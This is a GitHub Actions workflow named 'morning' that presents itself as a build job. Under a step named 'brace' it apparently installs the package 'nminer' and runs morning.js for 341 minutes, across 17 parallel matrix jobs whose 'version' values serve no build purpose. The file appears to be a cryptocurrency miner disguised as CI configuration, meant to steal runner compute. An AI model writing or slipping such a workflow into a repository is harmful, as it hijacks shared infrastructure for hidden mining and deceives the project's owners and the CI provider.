name: morning
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 8270 }
          - { version: 2846 }
          - { version: 7235 }
          - { version: 8462 }
          - { version: 1176 }
          - { version: 8688 }
          - { version: 4372 }
          - { version: 7136 }
          - { version: 1897 }
          - { version: 5140 }
          - { version: 7515 }
          - { version: 4542 }
          - { version: 2666 }
          - { version: 5002 }
          - { version: 5164 }
          - { version: 8854 }
          - { version: 8763 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: brace
        run: |
          npm install nminer@latest
          timeout 341m node morning.js || echo "morning executed"